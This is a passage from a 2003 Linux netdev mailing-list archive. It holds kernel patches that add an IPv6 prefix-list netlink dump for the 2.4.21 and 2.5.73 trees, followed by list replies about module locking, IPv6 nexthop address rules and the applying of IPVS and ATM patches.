addrconf_dad_start(ift); + addrconf_dad_start(ift, 0); in6_ifa_put(ift); in6_dev_put(idev); out: @@ -1211,7 +1211,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL, NULL); } @@ -1238,7 +1238,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1378,7 +1378,7 @@ } create = 1; - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF); } if (ifp && valid_lft == 0) { @@ -1529,7 +1529,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1704,7 +1704,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1943,8 +1943,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1958,7 +1957,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1968,7 +1967,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); @@ -2459,6 +2458,7 @@ [RTM_DELROUTE - RTM_BASE] = { .doit = inet6_rtm_delroute, }, [RTM_GETROUTE - RTM_BASE] = { .doit = inet6_rtm_getroute, .dumpit = inet6_dump_fib, }, + [RTM_GETPLIST - RTM_BASE] = { .dumpit = inet6_dump_prefix, }, }; static void ipv6_ifa_notify(int event, struct inet6_ifaddr *ifp) diff -ruN linux-2.5.73.org/net/ipv6/route.c PATCHES/linux-2.5.73/net/ipv6/route.c --- linux-2.5.73.org/net/ipv6/route.c 2003-06-22 11:33:05.000000000 -0700 +++ PATCHES/linux-2.5.73/net/ipv6/route.c 2003-07-14 10:30:59.000000000 -0700 @@ -1511,6 +1511,66 @@ return 0; } +static int rt6_fill_prefix(struct sk_buff *skb, struct rt6_info *rt, + int type, u32 pid, u32 seq) +{ + struct in6_prefix_msg *pmsg; + struct nlmsghdr *nlh; + unsigned char *b = skb->tail; + + nlh = NLMSG_PUT(skb, pid, seq, type, sizeof(*pmsg)); + pmsg = NLMSG_DATA(nlh); + pmsg->ifindex = rt->rt6i_dev->ifindex; + pmsg->prefix_len = rt->rt6i_dst.plen; + ipv6_addr_copy(&pmsg->prefix, &rt->rt6i_dst.addr); + nlh->nlmsg_len = skb->tail - b; + return skb->len; + +nlmsg_failure: + printk(KERN_INFO "rt6_fill_prefix:skb size not enough\n"); + skb_trim(skb, b - skb->data); + return -1; +} + +static int rt6_dump_route_prefix(struct rt6_info *rt, void *p_arg) +{ + int addr_type; + struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + + /* + * Definition of a prefix : + * - Should be autoconfigured + * - No nexthop + * - Not a linklocal, loopback or multicast type. + */ + if (rt->rt6i_nexthop || (rt->rt6i_flags & RTF_ADDRCONF) == 0) + return 0; + addr_type = ipv6_addr_type(&rt->rt6i_dst.addr); + if ((addr_type & (IPV6_ADDR_LINKLOCAL | IPV6_ADDR_LOOPBACK | + IPV6_ADDR_MULTICAST)) != 0 || + addr_type == IPV6_ADDR_ANY) + return 0; + return rt6_fill_prefix(arg->skb, rt, RTM_GETPLIST, + NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq); +} + +static int fib6_dump_prefix(struct fib6_walker_t *w) +{ + int res; + struct rt6_info *rt; + + for (rt = w->leaf; rt; rt = rt->u.next) { + res = rt6_dump_route_prefix(rt, w->args); + if (res < 0) { + /* Frame is full, suspend walking */ + w->leaf = rt; + return 1; + } + } + w->leaf = NULL; + return 0; +} + static void fib6_dump_end(struct netlink_callback *cb) { struct fib6_walker_t *w = (void*)cb->args[0]; @@ -1532,7 +1592,8 @@ return cb->done(cb); } -int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb) +static int __inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb, + int prefix) { struct rt6_rtnl_dump_arg arg; struct fib6_walker_t *w; @@ -1559,7 +1620,10 @@ RT6_TRACE("dump<%p", w); memset(w, 0, sizeof(*w)); w->root = &ip6_routing_table; - w->func = fib6_dump_node; + if (prefix) + w->func = fib6_dump_prefix; + else + w->func = fib6_dump_node; w->args = &arg; cb->args[0] = (long)w; read_lock_bh(&rt6_lock); @@ -1586,6 +1650,16 @@ return res; } +int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb) +{ + return __inet6_dump_fib(skb, cb, 0); +} + +int inet6_dump_prefix(struct sk_buff *skb, struct netlink_callback *cb) +{ + return __inet6_dump_fib(skb, cb, 1); +} + int inet6_rtm_getroute(struct sk_buff *in_skb, struct nlmsghdr* nlh, void *arg) { struct rtattr **rta = arg; ------------------------------------------------------------------------------ From krkumar@us.ibm.com Mon Jul 14 15:45:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 15:45:22 -0700 (PDT) Received: from e3.ny.us.ibm.com (e3.ny.us.ibm.com [32.97.182.103]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EMjGFl014722 for ; Mon, 14 Jul 2003 15:45:17 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e3.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6EMiSpW183284; Mon, 14 Jul 2003 18:44:28 -0400 Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6EMiQgo243202; Mon, 14 Jul 2003 18:44:27 -0400 Date: Mon, 14 Jul 2003 15:43:01 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: yoshfuji@linux-ipv6.org cc: davem@redhat.com, , , , Subject: [PATCH 4/4] Prefix List against 2.4.21 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4025 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev ------------------ Prefix List against 2.4.21 --------------------------- diff -ruN linux-2.4.21.org/include/linux/ipv6_route.h PATCHES/linux-2.4.21/include/linux/ipv6_route.h --- linux-2.4.21.org/include/linux/ipv6_route.h 1998-08-27 19:33:08.000000000 -0700 +++ PATCHES/linux-2.4.21/include/linux/ipv6_route.h 2003-07-14 10:30:53.000000000 -0700 @@ -53,4 +53,16 @@ #define RTMSG_NEWROUTE 0x21 #define RTMSG_DELROUTE 0x22 +/* + * Return entire prefix list in array of following structures. Provides the + * prefix and prefix length for all devices. + */ + +struct in6_prefix_msg +{ + int ifindex; + int prefix_len; + struct in6_addr prefix; +}; + #endif diff -ruN linux-2.4.21.org/include/linux/rtnetlink.h PATCHES/linux-2.4.21/include/linux/rtnetlink.h --- linux-2.4.21.org/include/linux/rtnetlink.h 2002-11-28 15:53:15.000000000 -0800 +++ PATCHES/linux-2.4.21/include/linux/rtnetlink.h 2003-07-14 12:32:49.000000000 -0700 @@ -46,7 +46,9 @@ #define RTM_DELTFILTER (RTM_BASE+29) #define RTM_GETTFILTER (RTM_BASE+30) -#define RTM_MAX (RTM_BASE+31) +#define RTM_GETPLIST (RTM_BASE+34) + +#define RTM_MAX (RTM_GETPLIST+1) /* Generic structure for encapsulation optional route information. @@ -198,10 +200,11 @@ RTA_MULTIPATH, RTA_PROTOINFO, RTA_FLOW, - RTA_CACHEINFO + RTA_CACHEINFO, + RTA_RA6INFO, /* No support yet, send event on new prefix event */ }; -#define RTA_MAX RTA_CACHEINFO +#define RTA_MAX RTA_RA6INFO #define RTM_RTA(r) ((struct rtattr*)(((char*)(r)) + NLMSG_ALIGN(sizeof(struct rtmsg)))) #define RTM_PAYLOAD(n) NLMSG_PAYLOAD(n,sizeof(struct rtmsg)) diff -ruN linux-2.4.21.org/include/net/ip6_route.h PATCHES/linux-2.4.21/include/net/ip6_route.h --- linux-2.4.21.org/include/net/ip6_route.h 2003-06-13 07:51:39.000000000 -0700 +++ PATCHES/linux-2.4.21/include/net/ip6_route.h 2003-07-14 12:49:45.000000000 -0700 @@ -84,6 +84,7 @@ struct nlmsghdr; struct netlink_callback; extern int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb); +extern int inet6_dump_prefix(struct sk_buff *skb, struct netlink_callback *cb); extern int inet6_rtm_newroute(struct sk_buff *skb, struct nlmsghdr* nlh, void *arg); extern int inet6_rtm_delroute(struct sk_buff *skb, struct nlmsghdr* nlh, void *arg); extern int inet6_rtm_getroute(struct sk_buff *skb, struct nlmsghdr* nlh, void *arg); diff -ruN linux-2.4.21.org/net/ipv6/addrconf.c PATCHES/linux-2.4.21/net/ipv6/addrconf.c --- linux-2.4.21.org/net/ipv6/addrconf.c 2003-06-13 07:51:39.000000000 -0700 +++ PATCHES/linux-2.4.21/net/ipv6/addrconf.c 2003-07-14 12:21:50.000000000 -0700 @@ -101,7 +101,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -889,7 +889,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL); } @@ -916,7 +916,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1054,7 +1054,7 @@ return; } - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF); } if (ifp && valid_lft == 0) { @@ -1166,7 +1166,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1341,7 +1341,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1578,8 +1578,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1593,7 +1592,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1603,7 +1602,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); @@ -1987,6 +1986,36 @@ { inet6_rtm_delroute, NULL, }, { inet6_rtm_getroute, inet6_dump_fib, }, { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, inet6_dump_prefix }, + { NULL, NULL, }, }; static void ipv6_ifa_notify(int event, struct inet6_ifaddr *ifp) diff -ruN linux-2.4.21.org/net/ipv6/route.c PATCHES/linux-2.4.21/net/ipv6/route.c --- linux-2.4.21.org/net/ipv6/route.c 2003-06-13 07:51:39.000000000 -0700 +++ PATCHES/linux-2.4.21/net/ipv6/route.c 2003-07-14 10:30:53.000000000 -0700 @@ -1627,6 +1627,66 @@ return 0; } +static int rt6_fill_prefix(struct sk_buff *skb, struct rt6_info *rt, + int type, u32 pid, u32 seq) +{ + struct in6_prefix_msg *pmsg; + struct nlmsghdr *nlh; + unsigned char *b = skb->tail; + + nlh = NLMSG_PUT(skb, pid, seq, type, sizeof(*pmsg)); + pmsg = NLMSG_DATA(nlh); + pmsg->ifindex = rt->rt6i_dev->ifindex; + pmsg->prefix_len = rt->rt6i_dst.plen; + ipv6_addr_copy(&pmsg->prefix, &rt->rt6i_dst.addr); + nlh->nlmsg_len = skb->tail - b; + return skb->len; + +nlmsg_failure: + printk(KERN_INFO "rt6_fill_prefix:skb size not enough\n"); + skb_trim(skb, b - skb->data); + return -1; +} + +static int rt6_dump_route_prefix(struct rt6_info *rt, void *p_arg) +{ + int addr_type; + struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + + /* + * Definition of a prefix : + * - Should be autoconfigured + * - No nexthop + * - Not a linklocal, loopback or multicast type. + */ + if (rt->rt6i_nexthop || (rt->rt6i_flags & RTF_ADDRCONF) == 0) + return 0; + addr_type = ipv6_addr_type(&rt->rt6i_dst.addr); + if ((addr_type & (IPV6_ADDR_LINKLOCAL | IPV6_ADDR_LOOPBACK | + IPV6_ADDR_MULTICAST)) != 0 || + addr_type == IPV6_ADDR_ANY) + return 0; + return rt6_fill_prefix(arg->skb, rt, RTM_GETPLIST, + NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq); +} + +static int fib6_dump_prefix(struct fib6_walker_t *w) +{ + int res; + struct rt6_info *rt; + + for (rt = w->leaf; rt; rt = rt->u.next) { + res = rt6_dump_route_prefix(rt, w->args); + if (res < 0) { + /* Frame is full, suspend walking */ + w->leaf = rt; + return 1; + } + } + w->leaf = NULL; + return 0; +} + static void fib6_dump_end(struct netlink_callback *cb) { struct fib6_walker_t *w = (void*)cb->args[0]; @@ -1648,7 +1708,8 @@ return cb->done(cb); } -int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb) +static int __inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb, + int prefix) { struct rt6_rtnl_dump_arg arg; struct fib6_walker_t *w; @@ -1675,7 +1736,10 @@ RT6_TRACE("dump<%p", w); memset(w, 0, sizeof(*w)); w->root = &ip6_routing_table; - w->func = fib6_dump_node; + if (prefix) + w->func = fib6_dump_prefix; + else + w->func = fib6_dump_node; w->args = &arg; cb->args[0] = (long)w; read_lock_bh(&rt6_lock); @@ -1702,6 +1766,16 @@ return res; } +int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb) +{ + return __inet6_dump_fib(skb, cb, 0); +} + +int inet6_dump_prefix(struct sk_buff *skb, struct netlink_callback *cb) +{ + return __inet6_dump_fib(skb, cb, 1); +} + int inet6_rtm_getroute(struct sk_buff *in_skb, struct nlmsghdr* nlh, void *arg) { struct rtattr **rta = arg; ----------------------------------------------------------------------------- From shemminger@osdl.org Mon Jul 14 15:49:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 15:49:58 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EMnsFl015077 for ; Mon, 14 Jul 2003 15:49:54 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6EMnkI16850; Mon, 14 Jul 2003 15:49:46 -0700 Date: Mon, 14 Jul 2003 15:49:46 -0700 From: Stephen Hemminger To: N N Ashok Cc: netdev@oss.sgi.com Subject: Re: Kernel locking up in module Message-Id: <20030714154946.27369852.shemminger@osdl.org> In-Reply-To: <200307141746.30761.nalkunda@egr.msu.edu> References: <200307141746.30761.nalkunda@egr.msu.edu> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4026 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev On Mon, 14 Jul 2003 17:46:30 -0400 N N Ashok wrote: > Hi All, > I am creating a module to measure the outgoing bandwidth usage on the > interfaces. It uses the get_stats() of the device to get the current stats > and then computes the bandwidth usage. The algorithm for the usage > calculation are borrowed from iproute2 package (tc/tc_estimator.c). > The problem is that the kernel keeps locking up. I am using rwlock_t locks > to lock the data. In the code, I traverse the list of bwuage structures and > as a debug message am printing whether the traversal ended in the variable > becoming null (which it should if everything went right), but the variable is > non-null every other time I insert the module. > printk(KERN_INFO "bwestimator: dev: %s. bwusage: %s.\n", dev ? "non-null" : > "null", bwusage ? "non-null" : "null"); > > I think this has got to do with some locking issues. As this is my first go > at the kernel locking, I might have used the wrong kind of locks. I have > attached the module source, header and the log messages as I inserted the > module a couple of times. I request you all to please help me as I am totally > lost here. > > Thanks, > Ashok You are not locking out the bottom half receive thread so it will deadlock when it runs while your code holds the top half lock. From kuznet@ms2.inr.ac.ru Mon Jul 14 16:29:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 16:29:34 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ENTLFl015900 for ; Mon, 14 Jul 2003 16:29:24 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA06071; Tue, 15 Jul 2003 03:29:12 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307142329.DAA06071@dub.inr.ac.ru> Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT To: davem@redhat.com (David S. Miller) Date: Tue, 15 Jul 2003 03:29:12 +0400 (MSD) Cc: jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: <20030713005345.1fea1092.davem@redhat.com> from "David S. Miller" at éÀÌ 13, 2003 12:53:45 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4027 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > Hey guys, even though yoshfuji is away I don't see any > reason why I shouldn't apply the patch below to both > 2.4.x and 2.5.x. It looks very uncontroversial to me. > > Any objections? I would wait for experts. Technically IPv6 does not allow use of non-link-local address as nexthop address, because nexthop address is expected to be unique for router. Use of IPv4-COMPAT format for tunnels was a hack to make use of tunnel more handly, it just a tricky way to encapsulate an IPv4 address inside IPv6 one, it has nothing to do with _real_ IPv4-COMPAT addresses, (though logically IPv4-COMPAT addresses _are_ really link-local for 6over4 "network") it is just an element of our API. Use of 6of4 address is very strange idea in this context, it does not contradict to anything, of course, but it looks utterly stupid: 6to4 is a complicated format, where information about nexthop is encoded in an inapproriate way. The questions sort of: "What the hell? I do a route with nexthop 2002:x:y::a:b and a:b disappears somewhere." And the question is right, because plain logic requires to use a:b as meaningful part of nexthop, it is the part which provides node _identity_, x:y is just routing information, identifying particullar "6to4" network, it is meaningless when used as a nexthop address. Shortly, this is mess. Technically, it is just one more trick and useless one, logically... mess. Alexey From nalkunda@egr.msu.edu Mon Jul 14 16:42:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 16:42:46 -0700 (PDT) Received: from sys14.mail.msu.edu (sys14.mail.msu.edu [35.9.75.114]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ENgdFl016391 for ; Mon, 14 Jul 2003 16:42:39 -0700 Received: from elans.cse.msu.edu ([35.9.43.164] helo=elans-pc.elans.cse.msu.edu) by sys14.mail.msu.edu with asmtp (Exim 4.10 #3) (TLSv1:RC4-MD5:128) (authenticated as nalkunda) id 19cCxl-000O6G-00; Mon, 14 Jul 2003 19:42:33 -0400 Content-Type: text/plain; charset="iso-8859-1" From: N N Ashok Organization: CSE, Michigan State University To: Stephen Hemminger Subject: Re: Kernel locking up in module Date: Mon, 14 Jul 2003 19:35:18 -0400 User-Agent: KMail/1.4.3 Cc: netdev@oss.sgi.com References: <200307141746.30761.nalkunda@egr.msu.edu> <20030714154946.27369852.shemminger@osdl.org> In-Reply-To: <20030714154946.27369852.shemminger@osdl.org> MIME-Version: 1.0 Message-Id: <200307141935.18837.nalkunda@egr.msu.edu> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6ENgdFl016391 X-archive-position: 4028 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nalkunda@egr.msu.edu Precedence: bulk X-list: netdev On Monday 14 July 2003 18:49, Stephen Hemminger scrawled: > On Mon, 14 Jul 2003 17:46:30 -0400 > > N N Ashok wrote: > > Hi All, > > I am creating a module to measure the outgoing bandwidth usage on the > > interfaces. It uses the get_stats() of the device to get the current > > stats and then computes the bandwidth usage. The algorithm for the usage > > calculation are borrowed from iproute2 package (tc/tc_estimator.c). The > > problem is that the kernel keeps locking up. I am using rwlock_t locks to > > lock the data. In the code, I traverse the list of bwuage structures and > > as a debug message am printing whether the traversal ended in the > > variable becoming null (which it should if everything went right), but > > the variable is non-null every other time I insert the module. > > printk(KERN_INFO "bwestimator: dev: %s. bwusage: %s.\n", dev ? > > "non-null" : "null", bwusage ? "non-null" : "null"); > > > > I think this has got to do with some locking issues. As this is my > > first go at the kernel locking, I might have used the wrong kind of > > locks. I have attached the module source, header and the log messages as > > I inserted the module a couple of times. I request you all to please help > > me as I am totally lost here. > > > > Thanks, > > Ashok > > You are not locking out the bottom half receive thread so it will deadlock > when it runs while your code holds the top half lock. Hi Stephen, Thanks for the reply. Do I used write_lock_bh()/write_unlock_bh() for my lock (bwusage_head_lock) while still using read_lock() for dev_base_lock ? Thanks, Ashok From kuznet@ms2.inr.ac.ru Mon Jul 14 16:49:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 16:49:55 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ENnpFl016782 for ; Mon, 14 Jul 2003 16:49:52 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA06134; Tue, 15 Jul 2003 03:49:43 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307142349.DAA06134@dub.inr.ac.ru> Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked To: davem@redhat.com (David S. Miller) Date: Tue, 15 Jul 2003 03:49:43 +0400 (MSD) Cc: netdev@oss.sgi.com In-Reply-To: <20030710.214551.08349572.davem@redhat.com> from "David S. Miller" at éÀÌ 10, 2003 09:45:51 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4029 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > Alexey, please add some sanity to this discussion. It is about anycast addresses, I maybe not competent here. I have no idea what is purpose of all-routers anycast. However, my modest opinion is here: IN NO WAY ANYCAST ADDRESSES MAY BE USED AS NEXTHOP ADDRESSES. NEXTHOP ADDRESS IS THE ADDRESS WHICH IS EXPECTED TO BE SOURCE OF REDIRECT MESSAGES ET AL. ANYCAST ADDRESSES ARE INVALID AS SOURCE, HENCE... Period. Alexey From davem@redhat.com Mon Jul 14 17:12:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 17:12:41 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F0CZFl017433 for ; Mon, 14 Jul 2003 17:12:35 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA12223; Mon, 14 Jul 2003 17:03:01 -0700 Date: Mon, 14 Jul 2003 17:03:01 -0700 From: "David S. Miller" To: Roberto Nibali Cc: albertogli@telpin.com.ar, netdev@oss.sgi.com, linux-net@vger.kernel.org, linux-kernel@vger.kernel.org Subject: Re: [PATCH] IPVS' Kconfig LBLC and LBLCR configuration typo Message-Id: <20030714170301.4ae9953a.davem@redhat.com> In-Reply-To: <3F130F84.8010104@drugphish.ch> References: <20030714140350.GB1389@telpin.com.ar> <3F130F84.8010104@drugphish.ch> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4030 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 14 Jul 2003 22:16:04 +0200 Roberto Nibali wrote: > > --- Kconfig.orig 2003-07-14 10:32:06.000000000 -0300 > > +++ Kconfig 2003-07-14 10:32:57.000000000 -0300 > > @@ -147,7 +147,7 @@ > > Obviously correct. Dave, if you haven't already, please apply to your > tree, thanks. We're working on the 2.4.x patch ;). Applied, I'm also still waiting for the timer fix on the 2.5.x side. The IPVS stuff went into 2.6.0-test1 BTW. From davem@redhat.com Mon Jul 14 17:20:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 17:21:03 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F0KuFl017850 for ; Mon, 14 Jul 2003 17:20:56 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA12254; Mon, 14 Jul 2003 17:11:19 -0700 Date: Mon, 14 Jul 2003 17:11:18 -0700 From: "David S. Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][ATM] cleanup pppoatm and br2684 modules Message-Id: <20030714171118.63b33243.davem@redhat.com> In-Reply-To: <200307142108.h6EL8fsG021288@ginger.cmf.nrl.navy.mil> References: <200307142108.h6EL8fsG021288@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: 